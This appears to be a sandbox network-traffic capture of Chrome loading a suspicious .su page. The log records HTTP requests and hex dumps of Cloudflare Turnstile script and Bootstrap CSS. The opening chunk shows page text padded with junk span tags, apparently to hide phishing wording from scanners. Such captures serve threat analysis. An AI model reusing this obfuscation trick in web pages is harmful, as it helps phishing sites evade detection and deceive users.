                                                          2024-01-24 14:33:56 UTC1199INData Raw: 41 68 4f 6f 6d 52 6e 6c 44 48 41 72 4b 64 3c 2f 73 70 61 6e 3e 67 65 20 69 73 20 72 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 56 53 4a 66 52 45 56 6e 44 22 3e 51 63 4c 57 78 77 79 43 6d 74 3c 2f 73 70 61 6e 3e 75 6e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 56 53 4a 66 52 45 56 6e 44 22 3e 4c 6c 44 66 48 78 43 6f 58 3c 2f 73 70 61 6e 3e 6e 69 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 56 53 4a 66 52 45 56 6e 44 22 3e 49 65 50 67 78 73 43 6c 55 6d 64 47 3c 2f 73 70 61 6e 3e 6e 67 20 62 72 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 56 53 4a 66 52 45 56 6e 44 22 3e 68 4d 46 52 4c 54 5a 69 6d 3c 2f 73 70 61 6e 3e 6f 77 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 56 53 4a 66 52 45 56 6e 44 22 3e 71 79 72 7a 51 73 41 6a 4c 66 3c 2f 73 70 61 6e 3e 73 65 3c 73 70 61 6e 20 63 6c 61
                                                          Data Ascii: AhOomRnlDHArKd</span>ge is r<span class="VSJfREVnD">QcLWxwyCmt</span>un<span class="VSJfREVnD">LlDfHxCoX</span>ni<span class="VSJfREVnD">IePgxsClUmdG</span>ng br<span class="VSJfREVnD">hMFRLTZim</span>ow<span class="VSJfREVnD">qyrzQsAjLf</span>se<span cla
                                                          2024-01-24 14:33:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.649724104.17.2.1844432104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:33:56 UTC562OUTGET /turnstile/v0/api.js HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: script
                                                          Referer: https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-01-24 14:33:56 UTC320INHTTP/1.1 302 Found
                                                          Date: Wed, 24 Jan 2024 14:33:56 GMT
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          location: /turnstile/v0/g/ea25f566/api.js
                                                          access-control-allow-origin: *
                                                          cache-control: max-age=300, public
                                                          vary: accept-encoding
                                                          Server: cloudflare
                                                          CF-RAY: 84a8fe916cc6134d-ATL
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-01-24 14:33:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          4192.168.2.649725151.101.1.2294432104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:33:56 UTC594OUTGET /npm/bootstrap@5.0.2/dist/css/bootstrap.min.css HTTP/1.1
                                                          Host: cdn.jsdelivr.net
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: text/css,*/*;q=0.1
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: style
                                                          Referer: https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-01-24 14:33:57 UTC758INHTTP/1.1 200 OK
                                                          Connection: close
                                                          Content-Length: 155845
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Expose-Headers: *
                                                          Timing-Allow-Origin: *
                                                          Cache-Control: public, max-age=31536000, s-maxage=31536000, immutable
                                                          Cross-Origin-Resource-Policy: cross-origin
                                                          X-Content-Type-Options: nosniff
                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                          Content-Type: text/css; charset=utf-8
                                                          X-JSD-Version: 5.0.2
                                                          X-JSD-Version-Type: version
                                                          ETag: W/"260c5-fByeBXPlzqi603M74vxjqoxo6o0"
                                                          Accept-Ranges: bytes
                                                          Date: Wed, 24 Jan 2024 14:33:56 GMT
                                                          Age: 4366846
                                                          X-Served-By: cache-fra-eddf8230097-FRA, cache-bog2260037-BOG
                                                          X-Cache: HIT, HIT
                                                          Vary: Accept-Encoding
                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                          2024-01-24 14:33:57 UTC16384INData Raw: 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 2f 2a 21 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 35 2e 30 2e 32 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 31 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 31 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 4c 49 43 45 4e 53 45 29 0a 20 2a 2f 3a 72 6f 6f 74 7b 2d 2d 62 73 2d 62 6c 75 65 3a 23 30 64 36 65 66 64 3b 2d
                                                          Data Ascii: @charset "UTF-8";/*! * Bootstrap v5.0.2 (https://getbootstrap.com/) * Copyright 2011-2021 The Bootstrap Authors * Copyright 2011-2021 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE) */:root{--bs-blue:#0d6efd;-
                                                          2024-01-24 14:33:57 UTC16384INData Raw: 74 74 65 72 2d 79 3a 30 7d 2e 67 2d 78 6c 2d 31 2c 2e 67 78 2d 78 6c 2d 31 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 3a 30 2e 32 35 72 65 6d 7d 2e 67 2d 78 6c 2d 31 2c 2e 67 79 2d 78 6c 2d 31 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 79 3a 30 2e 32 35 72 65 6d 7d 2e 67 2d 78 6c 2d 32 2c 2e 67 78 2d 78 6c 2d 32 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 3a 30 2e 35 72 65 6d 7d 2e 67 2d 78 6c 2d 32 2c 2e 67 79 2d 78 6c 2d 32 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 79 3a 30 2e 35 72 65 6d 7d 2e 67 2d 78 6c 2d 33 2c 2e 67 78 2d 78 6c 2d 33 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 3a 31 72 65 6d 7d 2e 67 2d 78 6c 2d 33 2c 2e 67 79 2d 78 6c 2d 33 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 79 3a 31 72 65 6d 7d 2e 67 2d 78 6c 2d 34 2c 2e 67 78 2d 78 6c 2d 34 7b 2d 2d 62
                                                          Data Ascii: tter-y:0}.g-xl-1,.gx-xl-1{--bs-gutter-x:0.25rem}.g-xl-1,.gy-xl-1{--bs-gutter-y:0.25rem}.g-xl-2,.gx-xl-2{--bs-gutter-x:0.5rem}.g-xl-2,.gy-xl-2{--bs-gutter-y:0.5rem}.g-xl-3,.gx-xl-3{--bs-gutter-x:1rem}.g-xl-3,.gy-xl-3{--bs-gutter-y:1rem}.g-xl-4,.gx-xl-4{--b
                                                          2024-01-24 14:33:57 UTC16384INData Raw: 69 6e 67 3a 31 72 65 6d 20 2e 37 35 72 65 6d 7d 2e 66 6f 72 6d 2d 66 6c 6f 61 74 69 6e 67 3e 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 3a 3a 2d 6d 6f 7a 2d 70 6c 61 63 65 68 6f 6c 64 65 72 7b 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 66 6f 72 6d 2d 66 6c 6f 61 74 69 6e 67 3e 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 3a 3a 70 6c 61 63 65 68 6f 6c 64 65 72 7b 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 66 6f 72 6d 2d 66 6c 6f 61 74 69 6e 67 3e 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 3a 6e 6f 74 28 3a 2d 6d 6f 7a 2d 70 6c 61 63 65 68 6f 6c 64 65 72 2d 73 68 6f 77 6e 29 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 2e 36 32 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 2e 36 32 35 72 65 6d 7d 2e 66 6f 72 6d 2d 66 6c 6f 61 74 69
                                                          Data Ascii: ing:1rem .75rem}.form-floating>.form-control::-moz-placeholder{color:transparent}.form-floating>.form-control::placeholder{color:transparent}.form-floating>.form-control:not(:-moz-placeholder-shown){padding-top:1.625rem;padding-bottom:.625rem}.form-floati
                                                          2024-01-24 14:33:57 UTC16384INData Raw: 66 64 7d 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 70 72 69 6d 61 72 79 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 64 36 65 66 64 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 30 64 36 65 66 64 7d 2e 62 74 6e 2d 63 68 65 63 6b 3a 66 6f 63 75 73 2b 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 70 72 69 6d 61 72 79 2c 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 70 72 69 6d 61 72 79 3a 66 6f 63 75 73 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 30 20 2e 32 35 72 65 6d 20 72 67 62 61 28 31 33 2c 31 31 30 2c 32 35 33 2c 2e 35 29 7d 2e 62 74 6e 2d 63 68 65 63 6b 3a 61 63 74 69 76 65 2b 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 70 72 69 6d 61 72 79 2c 2e 62 74 6e 2d 63 68 65 63 6b 3a 63 68 65 63 6b 65 64 2b 2e
                                                          Data Ascii: fd}.btn-outline-primary:hover{color:#fff;background-color:#0d6efd;border-color:#0d6efd}.btn-check:focus+.btn-outline-primary,.btn-outline-primary:focus{box-shadow:0 0 0 .25rem rgba(13,110,253,.5)}.btn-check:active+.btn-outline-primary,.btn-check:checked+.
                                                          2024-01-24 14:33:57 UTC16384INData Raw: 76 62 61 72 2d 74 6f 67 67 6c 65 72 7b 70 61 64 64 69 6e 67 3a 2e 32 35 72 65 6d 20 2e 37 35 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 32 35 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 78 2d 73 68 61 64 6f 77 20 2e 31 35 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 7d 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 72 65 64 75 63 65 64 2d 6d 6f 74 69 6f 6e 3a 72 65 64 75 63 65 29 7b 2e 6e 61 76 62 61 72 2d 74 6f 67 67 6c 65 72 7b 74 72 61 6e 73 69 74 69 6f 6e 3a 6e 6f 6e 65
                                                          Data Ascii: vbar-toggler{padding:.25rem .75rem;font-size:1.25rem;line-height:1;background-color:transparent;border:1px solid transparent;border-radius:.25rem;transition:box-shadow .15s ease-in-out}@media (prefers-reduced-motion:reduce){.navbar-toggler{transition:none
                                                          2024-01-24 14:33:57 UTC16384INData Raw: 72 73 74 2d 63 68 69 6c 64 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 2e 32 35 72 65 6d 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 30 7d 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 68 6f 72 69 7a 6f 6e 74 61 6c 3e 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 3a 6c 61 73 74 2d 63 68 69 6c 64 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 2e 32 35 72 65 6d 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 30 7d 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 68 6f 72 69 7a 6f 6e 74 61 6c 3e 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 2e 61 63 74 69 76 65 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 7d 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 68 6f 72 69
                                                          Data Ascii: rst-child{border-bottom-left-radius:.25rem;border-top-right-radius:0}.list-group-horizontal>.list-group-item:last-child{border-top-right-radius:.25rem;border-bottom-left-radius:0}.list-group-horizontal>.list-group-item.active{margin-top:0}.list-group-hori
                                                          2024-01-24 14:33:57 UTC16384INData Raw: 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 66 30 66 30 66 30 7d 2e 62 73 2d 70 6f 70 6f 76 65 72 2d 61 75 74 6f 5b 64 61 74 61 2d 70 6f 70 70 65 72 2d 70 6c 61 63 65 6d 65 6e 74 5e 3d 6c 65 66 74 5d 3e 2e 70 6f 70 6f 76 65 72 2d 61 72 72 6f 77 2c 2e 62 73 2d 70 6f 70 6f 76 65 72 2d 73 74 61 72 74 3e 2e 70 6f 70 6f 76 65 72 2d 61 72 72 6f 77 7b 72 69 67 68 74 3a 63 61 6c 63 28 2d 2e 35 72 65 6d 20 2d 20 31 70 78 29 3b 77 69 64 74 68 3a 2e 35 72 65 6d 3b 68 65 69 67 68 74 3a 31 72 65 6d 7d 2e 62 73 2d 70 6f 70 6f 76 65 72 2d 61 75 74 6f 5b 64 61 74 61 2d 70 6f 70 70 65 72 2d 70 6c 61 63 65 6d 65 6e 74 5e 3d 6c 65 66 74 5d 3e 2e 70 6f 70 6f 76 65 72 2d 61 72 72 6f 77 3a 3a 62 65 66 6f 72 65 2c 2e 62 73 2d 70 6f 70 6f 76 65 72 2d 73 74 61
                                                          Data Ascii: er-bottom:1px solid #f0f0f0}.bs-popover-auto[data-popper-placement^=left]>.popover-arrow,.bs-popover-start>.popover-arrow{right:calc(-.5rem - 1px);width:.5rem;height:1rem}.bs-popover-auto[data-popper-placement^=left]>.popover-arrow::before,.bs-popover-sta
                                                          2024-01-24 14:33:57 UTC16384INData Raw: 61 64 64 69 6e 67 3a 2e 32 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 2d 32 7b 70 61 64 64 69 6e 67 3a 2e 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 2d 33 7b 70 61 64 64 69 6e 67 3a 31 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 2d 34 7b 70 61 64 64 69 6e 67 3a 31 2e 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 2d 35 7b 70 61 64 64 69 6e 67 3a 33 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 78 2d 30 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 78 2d 31 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 2e 32 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 2e 32 35 72 65 6d 21 69 6d
                                                          Data Ascii: adding:.25rem!important}.p-2{padding:.5rem!important}.p-3{padding:1rem!important}.p-4{padding:1.5rem!important}.p-5{padding:3rem!important}.px-0{padding-right:0!important;padding-left:0!important}.px-1{padding-right:.25rem!important;padding-left:.25rem!im
                                                          2024-01-24 14:33:57 UTC16384INData Raw: 74 7d 2e 6d 74 2d 6d 64 2d 33 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 74 2d 6d 64 2d 34 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 2e 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 74 2d 6d 64 2d 35 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 33 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 74 2d 6d 64 2d 61 75 74 6f 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 61 75 74 6f 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 65 2d 6d 64 2d 30 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 65 2d 6d 64 2d 31 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 32 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 65 2d 6d 64 2d 32 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 72 65 6d 21 69 6d 70 6f 72 74 61
                                                          Data Ascii: t}.mt-md-3{margin-top:1rem!important}.mt-md-4{margin-top:1.5rem!important}.mt-md-5{margin-top:3rem!important}.mt-md-auto{margin-top:auto!important}.me-md-0{margin-right:0!important}.me-md-1{margin-right:.25rem!important}.me-md-2{margin-right:.5rem!importa
                                                          2024-01-24 14:33:57 UTC8389INData Raw: 78 6c 2d 30 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 62 2d 78 6c 2d 31 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 2e 32 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 62 2d 78 6c 2d 32 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 62 2d 78 6c 2d 33 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 62 2d 78 6c 2d 34 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 2e 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 62 2d 78 6c 2d 35 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 33 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 73 2d 78 6c 2d 30 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30
                                                          Data Ascii: xl-0{padding-bottom:0!important}.pb-xl-1{padding-bottom:.25rem!important}.pb-xl-2{padding-bottom:.5rem!important}.pb-xl-3{padding-bottom:1rem!important}.pb-xl-4{padding-bottom:1.5rem!important}.pb-xl-5{padding-bottom:3rem!important}.ps-xl-0{padding-left:0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          5192.168.2.649726104.17.2.1844432104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:33:57 UTC573OUTGET /turnstile/v0/g/ea25f566/api.js HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: script
                                                          Referer: https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-01-24 14:33:57 UTC296INHTTP/1.1 200 OK
                                                          Date: Wed, 24 Jan 2024 14:33:57 GMT
                                                          Content-Type: application/javascript; charset=UTF-8
                                                          Content-Length: 38245
                                                          Connection: close
                                                          Access-Control-Allow-Origin: *
                                                          Cache-Control: max-age=31536000
                                                          Server: cloudflare
                                                          CF-RAY: 84a8fe94d907ad5c-ATL
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-01-24 14:33:57 UTC1073INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 75 74 28 65 2c 72 2c 74 2c 6f 2c 66 2c 73 2c 6d 29 7b 74 72 79 7b 76 61 72 20 70 3d 65 5b 73 5d 28 6d 29 2c 67 3d 70 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 75 29 7b 74 28 75 29 3b 72 65 74 75 72 6e 7d 70 2e 64 6f 6e 65 3f 72 28 67 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 67 29 2e 74 68 65 6e 28 6f 2c 66 29 7d 66 75 6e 63 74 69 6f 6e 20 6c 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 74 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 66 29 7b 76 61 72 20 73 3d 65 2e 61 70 70 6c 79 28 72 2c 74 29 3b 66 75 6e 63 74
                                                          Data Ascii: "use strict";(function(){function ut(e,r,t,o,f,s,m){try{var p=e[s](m),g=p.value}catch(u){t(u);return}p.done?r(g):Promise.resolve(g).then(o,f)}function lt(e){return function(){var r=this,t=arguments;return new Promise(function(o,f){var s=e.apply(r,t);funct
                                                          2024-01-24 14:33:57 UTC1369INData Raw: 21 31 2c 6d 2c 70 3b 74 72 79 7b 66 6f 72 28 74 3d 74 2e 63 61 6c 6c 28 65 29 3b 21 28 66 3d 28 6d 3d 74 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 26 26 28 6f 2e 70 75 73 68 28 6d 2e 76 61 6c 75 65 29 2c 21 28 72 26 26 6f 2e 6c 65 6e 67 74 68 3d 3d 3d 72 29 29 3b 66 3d 21 30 29 3b 7d 63 61 74 63 68 28 67 29 7b 73 3d 21 30 2c 70 3d 67 7d 66 69 6e 61 6c 6c 79 7b 74 72 79 7b 21 66 26 26 74 2e 72 65 74 75 72 6e 21 3d 6e 75 6c 6c 26 26 74 2e 72 65 74 75 72 6e 28 29 7d 66 69 6e 61 6c 6c 79 7b 69 66 28 73 29 74 68 72 6f 77 20 70 7d 7d 72 65 74 75 72 6e 20 6f 7d 7d 66 75 6e 63 74 69 6f 6e 20 64 74 28 29 7b 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 49 6e 76 61 6c 69 64 20 61 74 74 65 6d 70 74 20 74 6f 20 64 65 73 74 72 75 63 74 75 72 65 20 6e
                                                          Data Ascii: !1,m,p;try{for(t=t.call(e);!(f=(m=t.next()).done)&&(o.push(m.value),!(r&&o.length===r));f=!0);}catch(g){s=!0,p=g}finally{try{!f&&t.return!=null&&t.return()}finally{if(s)throw p}}return o}}function dt(){throw new TypeError("Invalid attempt to destructure n
                                                          2024-01-24 14:33:57 UTC1369INData Raw: 74 75 72 6e 29 26 26 73 2e 63 61 6c 6c 28 66 29 2c 30 29 3a 66 2e 6e 65 78 74 29 26 26 21 28 73 3d 73 2e 63 61 6c 6c 28 66 2c 75 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 73 3b 73 77 69 74 63 68 28 66 3d 30 2c 73 26 26 28 75 3d 5b 75 5b 30 5d 26 32 2c 73 2e 76 61 6c 75 65 5d 29 2c 75 5b 30 5d 29 7b 63 61 73 65 20 30 3a 63 61 73 65 20 31 3a 73 3d 75 3b 62 72 65 61 6b 3b 63 61 73 65 20 34 3a 72 65 74 75 72 6e 20 74 2e 6c 61 62 65 6c 2b 2b 2c 7b 76 61 6c 75 65 3a 75 5b 31 5d 2c 64 6f 6e 65 3a 21 31 7d 3b 63 61 73 65 20 35 3a 74 2e 6c 61 62 65 6c 2b 2b 2c 66 3d 75 5b 31 5d 2c 75 3d 5b 30 5d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 20 37 3a 75 3d 74 2e 6f 70 73 2e 70 6f 70 28 29 2c 74 2e 74 72 79 73 2e 70 6f 70 28 29 3b 63 6f 6e 74 69 6e 75 65 3b
                                                          Data Ascii: turn)&&s.call(f),0):f.next)&&!(s=s.call(f,u[1])).done)return s;switch(f=0,s&&(u=[u[0]&2,s.value]),u[0]){case 0:case 1:s=u;break;case 4:return t.label++,{value:u[1],done:!1};case 5:t.label++,f=u[1],u=[0];continue;case 7:u=t.ops.pop(),t.trys.pop();continue;
                                                          2024-01-24 14:33:57 UTC1369INData Raw: 75 74 65 22 7d 29 28 24 7c 7c 28 24 3d 7b 7d 29 29 3b 76 61 72 20 44 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 5f 46 41 49 4c 53 3d 22 61 6c 77 61 79 73 2d 66 61 69 6c 73 22 2c 65 2e 53 4f 4d 45 54 49 4d 45 53 5f 46 41 49 4c 53 3d 22 73 6f 6d 65 74 69 6d 65 73 2d 66 61 69 6c 73 22 2c 65 2e 4b 45 45 50 53 5f 4c 4f 4f 50 49 4e 47 3d 22 6b 65 65 70 73 2d 6c 6f 6f 70 69 6e 67 22 2c 65 2e 54 4f 4f 5f 53 4c 4f 57 3d 22 74 6f 6f 2d 73 6c 6f 77 22 2c 65 2e 4f 54 48 45 52 3d 22 6f 74 68 65 72 22 7d 29 28 44 65 7c 7c 28 44 65 3d 7b 7d 29 29 3b 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 29 7b 72 65 74 75 72 6e 20 48 28 5b 22 61 75 74 6f 22 2c 22 64 61 72 6b 22 2c 22 6c 69 67 68 74 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 46 65 28 65 29 7b
                                                          Data Ascii: ute"})($||($={}));var De;(function(e){e.ALWAYS_FAILS="always-fails",e.SOMETIMES_FAILS="sometimes-fails",e.KEEPS_LOOPING="keeps-looping",e.TOO_SLOW="too-slow",e.OTHER="other"})(De||(De={}));function Ue(e){return H(["auto","dark","light"],e)}function Fe(e){
